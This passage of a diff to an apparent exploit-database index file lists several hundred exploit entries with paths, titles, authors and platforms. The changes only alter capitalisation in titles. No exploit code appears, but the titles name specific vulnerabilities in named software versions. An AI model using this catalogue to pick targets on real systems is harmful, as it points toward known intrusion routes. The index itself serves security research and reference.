Injections",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - Profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0 @@ -25427,12 +25427,12 @@ id,file,description,date,author,platform,type,port 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote,0 28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 28376,platforms/windows/remote/28376.html,"McKesson - ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 -28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 +28377,platforms/php/webapps/28377.txt,"Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x - JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 -28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 - Edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 +28382,platforms/php/webapps/28382.txt,"WP-DB Backup For Wordpress 1.6/1.7 - Edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 @@ -25476,7 +25476,7 @@ id,file,description,date,author,platform,type,port 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 -28428,platforms/php/webapps/28428.txt,"Yapig 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 +28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 @@ -25495,7 +25495,7 @@ id,file,description,date,author,platform,type,port 28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller - Config[Template_Path] Multiple Remote File Inclusion",2006-08-30,night_warrior771,php,webapps,0 28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x - Functions_Post.php Cross-Site Scripting",2006-08-30,imei,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 -28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 - Product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 +28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - Product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - admin/newsletters.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - admin/orders_status.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - admin/products_attributes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 @@ -25507,7 +25507,7 @@ id,file,description,date,author,platform,type,port 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusion",2006-09-01,MATASANOS,php,webapps,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 -28452,platforms/php/webapps/28452.txt,"WordPress Lazy SEO plugin 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 +28452,platforms/php/webapps/28452.txt,"Wordpress Lazy SEO plugin 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 28453,platforms/php/webapps/28453.txt,"ezContents 2.0.3 - event_list.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28454,platforms/php/webapps/28454.txt,"ezContents 2.0.3 - calendar.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28455,platforms/php/webapps/28455.txt,"ezContents 2.0. - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 @@ -25529,7 +25529,7 @@ id,file,description,date,author,platform,type,port 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0 28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution",2013-09-23,Metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,Metasploit,hardware,remote,0 -28485,platforms/php/webapps/28485.txt,"WordPress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 +28485,platforms/php/webapps/28485.txt,"Wordpress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion",2006-09-04,Kacper,php,webapps,0 @@ -25555,7 +25555,7 @@ id,file,description,date,author,platform,type,port 28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution",2013-09-24,Metasploit,hardware,remote,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 - 'index.php' album Parameter Cross-Site Scripting",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 - 'index.php' lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 -28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",windows,remote,0 +28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",windows,remote,0 28513,platforms/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service",2006-09-12,"securma massine",windows,dos,0 28514,platforms/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 - Terminal Parameter Directory Traversal",2006-09-12,"Chris Murtagh",cgi,webapps,0 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 @@ -25565,26 +25565,26 @@ id,file,description,date,author,platform,type,port 28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - Print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 - .FLC Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 -28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - includes/admin.inc.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - help.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - smile.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - entry.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - admin/preview.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - admin/log.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - admin/index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - admin/config.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - admin/admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn GuestBook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn GuestBook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn GuestBook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn GuestBook 1.x - includes/admin.inc.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn GuestBook 1.x - help.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn GuestBook 1.x - smile.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn GuestBook 1.x - entry.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn GuestBook 1.x - admin/preview.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn GuestBook 1.x - admin/log.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn GuestBook 1.x - admin/index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn GuestBook 1.x - admin/config.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn GuestBook 1.x - admin/admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28542,platforms/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device - Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",multiple,dos,0 28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 - Haut.php Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps,0 28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 - Ratings.php Cross-Site Scripting",2006-09-13,meto5757,php,webapps,0 @@ -25620,9 +25620,9 @@ id,file,description,date,author,platform,type,port 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - login.php username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 -28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 +28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - Default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 -28578,platforms/osx/dos/28578.txt,"Apple Mac OS X 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 +28578,platforms/osx/dos/28578.txt,"Apple Mac OSX 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 28579,platforms/php/webapps/28579.txt,"MyBulletinBoard 1.x - 'index.php' Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 @@ -25687,7 +25687,7 @@ id,file,description,date,author,platform,type,port 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 -28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 +28643,platforms/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 @@ -25817,12 +25817,12 @@ id,file,description,date,author,platform,type,port 28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - SQL.php Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 - Addnews.php Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0 -28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (beta) - KML/KMZ Files Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 +28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - KML/KMZ Files Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - Bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 28788,platforms/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 28789,platforms/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",solaris,local,0 -28790,platforms/php/webapps/28790.txt,"PHPList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 +28790,platforms/php/webapps/28790.txt,"phpList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - Config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 @@ -25841,7 +25841,7 @@ id,file,description,date,author,platform,type,port 29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Privilege Escalation",2013-10-08,"Lorenzo Cantoni",linux,local,0 28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 -28808,platforms/php/webapps/28808.txt,"WordPress Quick Contact Form Plugin 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0 +28808,platforms/php/webapps/28808.txt,"Wordpress Quick Contact Form Plugin 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0 28809,platforms/windows/remote/28809.rb,"HP LoadRunner - magentproc.exe Overflow",2013-10-08,Metasploit,windows,remote,443 28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 @@ -25857,7 +25857,7 @@ id,file,description,date,author,platform,type,port 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps,0 -28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 +28824,platforms/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusion",2006-10-18,Matdhule,php,webapps,0 @@ -25980,7 +25980,7 @@ id,file,description,date,author,platform,type,port 28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusion",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 -28948,platforms/osx/dos/28948.c,"Apple Mac OS X 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 +28948,platforms/osx/dos/28948.c,"Apple Mac OSX 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - newsletters/edition.php tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - ls.php Multiple Parameter Cross-Site Scripting",2006-11-09,"laurent gaffie",php,webapps,0 28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - ls.php Multiple Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 @@ -25990,7 +25990,7 @@ id,file,description,date,author,platform,type,port 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow SEH",2013-10-14,metacom,windows,local,0 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28957,platforms/android/dos/28957.txt,"Android Zygote - Socket and Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 -28959,platforms/php/webapps/28959.txt,"WordPress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 +28959,platforms/php/webapps/28959.txt,"Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution",2013-10-14,Metasploit,multiple,remote,0 @@ -26001,7 +26001,7 @@ id,file,description,date,author,platform,type,port 28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 -28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 +28970,platforms/php/webapps/28970.txt,"Dexs PM System Wordpress Plugin - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage parameter) SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0 @@ -26011,7 +26011,7 @@ id,file,description,date,author,platform,type,port 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 -28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 - Functions.php Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 +28980,platforms/php/webapps/28980.txt,"Wordpress 2.0.5 - Functions.php Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 - seldir.html dir Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 